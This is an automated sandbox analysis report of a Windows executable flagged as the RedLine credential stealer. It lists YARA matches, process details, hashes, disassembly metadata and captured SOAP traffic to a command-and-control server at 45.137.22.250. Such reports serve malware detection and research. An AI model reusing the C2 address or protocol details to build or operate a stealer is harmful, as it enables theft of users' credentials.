xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>39.72.197.169</b:string><b:string>121.27.96.134</b:string><b:string>1.82.147.198</b:string><b:string>114.226.239.165</b:string><b:string>172.174.62.166</b:string><b:string>125.93.82.178</b:string><b:string>113.117.248.224</b:string><b:string>60.1.82.82</b:string><b:string>27.196.155.43</b:string><b:string>123.152.76.136</b:string><b:string>34.73.199.55</b:string><b:string>14.19.24.10</b:string><b:string>120.238.238.187</b:string><b:string>122.227.3.138</b:string><b:string>39.183.156.81</b:string><b:string>14.212.74.114</b:string><b:string>183.247.147.172</b:string><b:string>119.131.181.53</b: [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	45.137.22.250	55615	7532	C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 17:42:18.234985113 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.250:55615 Content-Length: 983075 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 26, 2024 17:42:21.110738039 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Dec 2024 16:42:20 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Dec 26, 2024 17:42:21.113604069 CET	217	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.250:55615 Content-Length: 983067 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 26, 2024 17:42:21.521496058 CET	25	IN	HTTP/1.1 100 Continue
Dec 26, 2024 17:42:22.157361984 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Dec 2024 16:42:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	11:42:02
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ljMiHZ8MwZ.exe"
Imagebase:	0xdb0000
File size:	591'360 bytes
MD5 hash:	4153363158F713A02E405D251823C0C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:42:05
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\ljMiHZ8MwZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ljMiHZ8MwZ.exe"
Imagebase:	0xab0000
File size:	591'360 bytes
MD5 hash:	4153363158F713A02E405D251823C0C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:42:05
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	98.5%
Signature Coverage:	14.9%
Total number of Nodes:	201
Total number of Limit Nodes:	11

Executed Functions

Function 05777D60 Relevance: 43.6, Strings: 33, Instructions: 2326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 05779FF7
(, xrefs: 05778691
(, xrefs: 05779F0D
, xrefs: 05778A77
7, xrefs: 0577964D
], xrefs: 0577998B
, xrefs: 05778CDE
(, xrefs: 05778884
7, xrefs: 057797FF
(, xrefs: 05779A3D
&, xrefs: 0577877B
L, xrefs: 05779B05
i, xrefs: 05779F17
O, xrefs: 0577812B
, xrefs: 05778F64
(, xrefs: 05778D71
$, xrefs: 057793B4
, xrefs: 057784B1
2, xrefs: 057782C5
&, xrefs: 05778E5B
7, xrefs: 05779995
&, xrefs: 0577896E
, xrefs: 05778B61
$, xrefs: 05779C8E
], xrefs: 05779643
i, xrefs: 05779D3C
(, xrefs: 05779105
, xrefs: 05778BF4
], xrefs: 057797F5
(, xrefs: 057781D5
$, xrefs: 057791EF
&, xrefs: 05779E1C
, xrefs: 0577904E

Memory Dump Source

Source File: 00000000.00000002.1742689957.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5770000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $$$$$$$&$&$&$&$'$($($($($($($($2$7$7$7$L$O$]$]$]$i$i
API String ID: 0-1096785575
Opcode ID: 462d9750809d3c39198d1850ee6edbcc639fcb415f8819ddc879d42e3f552104
Instruction ID: df024240355949c90ae57f41213603769b16b037b271338834724c3e3af0915f
Opcode Fuzzy Hash: 462d9750809d3c39198d1850ee6edbcc639fcb415f8819ddc879d42e3f552104
Instruction Fuzzy Hash: 64331830A106198FCB55EF38C898799B7B2FF89301F5086F9D809AB355DB71AA85CF41

Function 05777D43 Relevance: 43.6, Strings: 33, Instructions: 2309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 05779FF7
(, xrefs: 05778691
(, xrefs: 05779F0D
, xrefs: 05778A77
7, xrefs: 0577964D
], xrefs: 0577998B
, xrefs: 05778CDE
(, xrefs: 05778884
7, xrefs: 057797FF
(, xrefs: 05779A3D
&, xrefs: 0577877B
L, xrefs: 05779B05
i, xrefs: 05779F17
O, xrefs: 0577812B
, xrefs: 05778F64
(, xrefs: 05778D71
$, xrefs: 057793B4
, xrefs: 057784B1
2, xrefs: 057782C5
&, xrefs: 05778E5B
7, xrefs: 05779995
&, xrefs: 0577896E
, xrefs: 05778B61
$, xrefs: 05779C8E
], xrefs: 05779643
i, xrefs: 05779D3C
(, xrefs: 05779105
, xrefs: 05778BF4
], xrefs: 057797F5
(, xrefs: 057781D5
$, xrefs: 057791EF
&, xrefs: 05779E1C
, xrefs: 0577904E

Memory Dump Source

Source File: 00000000.00000002.1742689957.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5770000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $$$$$$$&$&$&$&$'$($($($($($($($2$7$7$7$L$O$]$]$]$i$i
API String ID: 0-1096785575
Opcode ID: e7a29eb3a0c738f3c9c283ec7a1d6238ad99826d11a87bd2d89d5ee65ead399e
Instruction ID: 05d30752b2bc2307179672112591c44e82be0055dce0f243d1b5c64280256746
Opcode Fuzzy Hash: e7a29eb3a0c738f3c9c283ec7a1d6238ad99826d11a87bd2d89d5ee65ead399e
Instruction Fuzzy Hash: 39331830A106198FCB55DF38C898799B7B2FF89300F5086F9D809AB355DB71AA85CF41

Function 05D4773C Relevance: 6.9, Strings: 5, Instructions: 622
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05D489CB
Hbq, xrefs: 05D4890D
Hbq, xrefs: 05D48883
Hbq, xrefs: 05D487FC
Hbq, xrefs: 05D48769

Memory Dump Source

Source File: 00000000.00000002.1743288500.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d40000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: d349ed1afad7e742d29e7ad02d4df5d7bc01d13d3a8ef6fa9c8d8746c4865016
Instruction ID: 6530f7bd5ac2c549d1fe9bb72f1ab274f422bf78d210840b4e2fbd6396f7d7d1
Opcode Fuzzy Hash: d349ed1afad7e742d29e7ad02d4df5d7bc01d13d3a8ef6fa9c8d8746c4865016
Instruction Fuzzy Hash: B0325A30A002588FDB54DFB9C8547AEBBF2BF88340F1485AAD449AB395DF349946CF91

Function 05D48198 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743288500.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d40000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f58528a7d5131982eedba668fcb9aa92a1d981b34552fabb2c35a6b665a14c8
Instruction ID: dddae792a09a312585429df2854ca6a23c255eb328b38998d9dba2f3ad56f39d
Opcode Fuzzy Hash: 7f58528a7d5131982eedba668fcb9aa92a1d981b34552fabb2c35a6b665a14c8
Instruction Fuzzy Hash: C1C14A35E002588FCF15CF69C884B9ABBB2FF88350F14C5AAD449AB255DB34D985DF90

Function 09184B70 Relevance: 16.3, Strings: 13, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 09185099
LR^q, xrefs: 09185056
8bq, xrefs: 09184C3B
$^q, xrefs: 091850E3
LR^q, xrefs: 09185064
$^q, xrefs: 091852C5
$^q, xrefs: 09184DE5
LR^q, xrefs: 09184F68
$^q, xrefs: 091850F3
8bq, xrefs: 09184C68
", xrefs: 09185285
$^q, xrefs: 091852D1
$^q, xrefs: 091850A9

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: "$8bq$8bq$LR^q$LR^q$LR^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2864199233
Opcode ID: d82e1715922984cc01851449f33eacfa2ba762fc12bb8d42357541c8ca8a1d84
Instruction ID: 18c27650c2b753f882e34b3ff6beb28d85a767d62afd940a63a3707104b3518a
Opcode Fuzzy Hash: d82e1715922984cc01851449f33eacfa2ba762fc12bb8d42357541c8ca8a1d84
Instruction Fuzzy Hash: 1731D474B112059FC7449B69980876A7BB6AB85308F14847AE156CB3E1EF358845CB91

Function 09183BF9 Relevance: 5.1, Strings: 4, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 09183D12
LR^q, xrefs: 09183BAA
$^q, xrefs: 09183C27
$^q, xrefs: 09183D02

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: LR^q$$^q$$^q$$^q
API String ID: 0-2876625903
Opcode ID: 533fd9e46342017af7b51c355d6f61396d01cfcfa9312c41ce3f7f8aa44efa2b
Instruction ID: 637f43bc64ea5d99ec151ba18e48cdc79a228b8d6e37b63450e679a47a3a95e4
Opcode Fuzzy Hash: 533fd9e46342017af7b51c355d6f61396d01cfcfa9312c41ce3f7f8aa44efa2b
Instruction Fuzzy Hash: 8941DB70B00249DFDB18AF68C84977FB7B5EB44B58F18852AF522AB280D7758942DF41

Function 09183CD3 Relevance: 3.9, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 09183BAA
$^q, xrefs: 09183C27
$^q, xrefs: 09183D02

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: LR^q$$^q$$^q
API String ID: 0-3333519130
Opcode ID: 80bad6b3c274c9c3aa45e37d8ee3ae995ee3af6e01a92d0439f5b2321ab82d7f
Instruction ID: cab22acf3454ffcab11ecda024e3b324d6ead3d05ccceea6435e6bf6a27d0235
Opcode Fuzzy Hash: 80bad6b3c274c9c3aa45e37d8ee3ae995ee3af6e01a92d0439f5b2321ab82d7f
Instruction Fuzzy Hash: 6931CC70B002089FDB186B58D809BBBB3A5EB40F59F08452AF522EB2D0D7758943AF11

Function 09189F18 Relevance: 2.7, Strings: 2, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 09189FF7
Te^q, xrefs: 0918A066

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: f81cd621b0026d4e577de2e6d4b9e59a1d33796789e2d45c6fb5920082ea3041
Instruction ID: a4d69b6a3b80756cb606bc9a750f95de83e859452fec1d97ec42a6a1b8400efa
Opcode Fuzzy Hash: f81cd621b0026d4e577de2e6d4b9e59a1d33796789e2d45c6fb5920082ea3041
Instruction Fuzzy Hash: D361E674E04619CFDB08DFAAC884AEEFBB6BF89304F10902AE419AB355DB315945DF50

Function 09184B60 Relevance: 2.6, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8bq, xrefs: 09184C68
8bq, xrefs: 09184C3B

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: 8bq$8bq
API String ID: 0-1276831224
Opcode ID: 0a53d6abdfd6a8e735f0f581ce3b0425d69a489a1d6f8e5c6c57e90045da21d2
Instruction ID: 7053f6b9560d65330560a0a9e6a09f9a6efd61a3da368ae9545e6593f2331fb0
Opcode Fuzzy Hash: 0a53d6abdfd6a8e735f0f581ce3b0425d69a489a1d6f8e5c6c57e90045da21d2
Instruction Fuzzy Hash: E431F574B102019FC744DB69D808B7A7BBABB85308F25807AE116CB3E1EF768841DB91

Function 09183279 Relevance: 2.5, Strings: 2, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0918329E
$^q, xrefs: 09183292

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 23b730699a86b1dccf94bddb47ab66bd7fedbe279d45eaaa8abb8ef5b298c5b7
Instruction ID: e2256c6579b8ee6e2915fb178ae2de23f8990b9694946eea56f5e22e7e9d3f8c
Opcode Fuzzy Hash: 23b730699a86b1dccf94bddb47ab66bd7fedbe279d45eaaa8abb8ef5b298c5b7
Instruction Fuzzy Hash: BBD05E30B542499FDB2E5F38A924A223BB57F43E8435A069B9401CF266CB13D80ADB25

Function 057723C4 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057724E2

Memory Dump Source

Source File: 00000000.00000002.1742689957.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5770000_ljMiHZ8MwZ.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 60ef0441d97b935c06b87689668e2c0474095ceb4b3456d44159647efdf0cf5f
Instruction ID: 1d19e01d914f626e35311da3260df1f7bd31395d95b200d3ed8d46a7e24ad5d2
Opcode Fuzzy Hash: 60ef0441d97b935c06b87689668e2c0474095ceb4b3456d44159647efdf0cf5f
Instruction Fuzzy Hash: 2351D0B5D003499FDF14CFA9D884ADEBFB1BF48310F24812AE819AB221D7719845DF91

Function 05771178 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057724E2

Memory Dump Source

Source File: 00000000.00000002.1742689957.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5770000_ljMiHZ8MwZ.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: df0b6f60caf6a2db41d9c61c50846ba8d26a3bd1b6a343093745a016a04d0d73
Instruction ID: 1c0ddd22c49d2764653a2d3750b59238b0d5c19ba1dcfea19e48268213c6bd5a
Opcode Fuzzy Hash: df0b6f60caf6a2db41d9c61c50846ba8d26a3bd1b6a343093745a016a04d0d73
Instruction Fuzzy Hash: 5751B0B5D003199FDF14CF9AD884ADEBBB5BF48310F24812AE819AB211D771A845CF91

Function 0918E918 Relevance: 1.6, Strings: 1, Instructions: 365COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0918EE28

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9ad6b0a40a5d753273361d7b2ec0b4020aad409810db25e00d772cb8d1145fd6
Instruction ID: adcdd3d1351b54704e87f66cf224ff1a9f3ddfc31f0023c295a94540a09e8bce
Opcode Fuzzy Hash: 9ad6b0a40a5d753273361d7b2ec0b4020aad409810db25e00d772cb8d1145fd6
Instruction Fuzzy Hash: 45E1A134F00209DFCB05EFA9CA94AAEBBB6FB88310F108469E415A7364CB359D85DF51

Function 057712CC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05774A61

Memory Dump Source

Source File: 00000000.00000002.1742689957.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5770000_ljMiHZ8MwZ.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6eae1b6dd172982692c90128aa56291cea36781c59f6c0d2d53029a4cab03fde
Instruction ID: 0077f9f335269fde0991ad3570b99e5080ff080d0de6b4c6c7bf02116acfd357
Opcode Fuzzy Hash: 6eae1b6dd172982692c90128aa56291cea36781c59f6c0d2d53029a4cab03fde
Instruction Fuzzy Hash: DB412AB5A00609CFCB14CF99D448AAABBF6FF88314F25C459E519AB321D774A841CFA4

Function 017A44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 017A59A9

Memory Dump Source

Source File: 00000000.00000002.1741228131.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17a0000_ljMiHZ8MwZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 47c4643b9bd818143577db8746c1a84f79919f2b8679f10b6cab8e123d5b4d02
Instruction ID: aeb83b8a732116f1df77db42206f6a111d548e1a1f2a962a60d2ae4e05faabd5
Opcode Fuzzy Hash: 47c4643b9bd818143577db8746c1a84f79919f2b8679f10b6cab8e123d5b4d02
Instruction Fuzzy Hash: C841D0B0D00719CBDB24DFA9C884B9EFBB5BF89304F60816AD408AB255DB756949CF90

Function 017A58EC Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 017A59A9

Memory Dump Source

Source File: 00000000.00000002.1741228131.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17a0000_ljMiHZ8MwZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6da433381d2fe21dd750d844beb8cc4e68b030d9908a6f4209490cba1ce9a9d2
Instruction ID: a22914523c0c00e4096a5377101127eee4774613d8a6fe410333cacbd2a68e4e
Opcode Fuzzy Hash: 6da433381d2fe21dd750d844beb8cc4e68b030d9908a6f4209490cba1ce9a9d2
Instruction Fuzzy Hash: B541F0B0D00719CEDB24CFA9C9847CDFBB5BF89304F60816AD408AB255DB756949CF90

Function 05D48AD0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743288500.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d40000_ljMiHZ8MwZ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 9c3ef42acf78b5a94f49cda9f7802e7d024943f54458b78e83412fc7f47ccb4a
Instruction ID: ce48fcae74dc4a5cc3635a92f29270b0152d32298571e8145c63f4b9e131e900
Opcode Fuzzy Hash: 9c3ef42acf78b5a94f49cda9f7802e7d024943f54458b78e83412fc7f47ccb4a
Instruction Fuzzy Hash: 6B3178B29002599FCB11CFA9D844AEEBFF8EF09310F14845AF954A7221C336A951DFA1

Function 017AD440 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,017ADD66,?,?,?,?,?), ref: 017ADE27

Memory Dump Source

Source File: 00000000.00000002.1741228131.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17a0000_ljMiHZ8MwZ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1ae335f083206462d47ac476cdb5079be076b7bf0d68e1c822fda79c763d4545
Instruction ID: d87e2706911618b4305f79853e4fb5ca510295abe6b93630e6a718b42cdb0d4d
Opcode Fuzzy Hash: 1ae335f083206462d47ac476cdb5079be076b7bf0d68e1c822fda79c763d4545
Instruction Fuzzy Hash: 5021E4B5900258DFDB10CF9AD984AEEFFF4EB48310F54841AE918A7310D375A944CFA5

Function 05D47784 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05D48AEA,?,?,?,?,?), ref: 05D48B8F

Memory Dump Source

Source File: 00000000.00000002.1743288500.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d40000_ljMiHZ8MwZ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 897d2f89059a67c887eb7713b32eef64c92a1408ed0490245363df1669884862
Instruction ID: 4bb248adcebb011efb9d27355601502487ed10f485d16b75b250e621122954ce
Opcode Fuzzy Hash: 897d2f89059a67c887eb7713b32eef64c92a1408ed0490245363df1669884862
Instruction Fuzzy Hash: 711137B58002599FDB10DF9AC844BDEBFF8EB48320F14841AE955A7220C375A954DFA5

Function 017ABAC0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 017ABB26

Memory Dump Source

Source File: 00000000.00000002.1741228131.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17a0000_ljMiHZ8MwZ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 11728820f2c5a3353aa6fa872c299b5a31163692035fe1c5692d2bd4dac65288
Instruction ID: f3d8a893bc83131692d70d5c62d28f35b23a923913d2d53b813574852e9293da
Opcode Fuzzy Hash: 11728820f2c5a3353aa6fa872c299b5a31163692035fe1c5692d2bd4dac65288
Instruction Fuzzy Hash: E1110FB5C002498FDB20CF9AC844ADEFFF4AB88320F10852AD829A7610C375A545CFA5

Function 09182CA8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 09182CE1

Memory Dump Source

Source File: 00000000.00000002.1744280416.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9180000_ljMiHZ8MwZ.jbxd

Similarity

API ID:
String ID: %*&/)(#$^@!~-_
API String ID: 0-3325533558
Opcode ID: 6cd32619a3ebf1d8771e0591ea8f7ddbc549521dc79c547e2f848f78bbbf7aae
Instruction ID: f8564f44d7d6e5c06df8da4ebdc87493db56250e194552e5f00732c4b9b8f2b5
Opcode Fuzzy Hash: 6cd32619a3ebf1d8771e0591ea8f7ddbc549521dc79c547e2f848f78bbbf7aae
Instruction Fuzzy Hash: F651C331B041449FD705AF78D485BAEBBB2FF88300F1588A9E8919B3A9DF715D49CB81

Function 09182CB8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

%*&/)(#$^@!~-_, xrefs: 09182CE1

Memory Dump Source

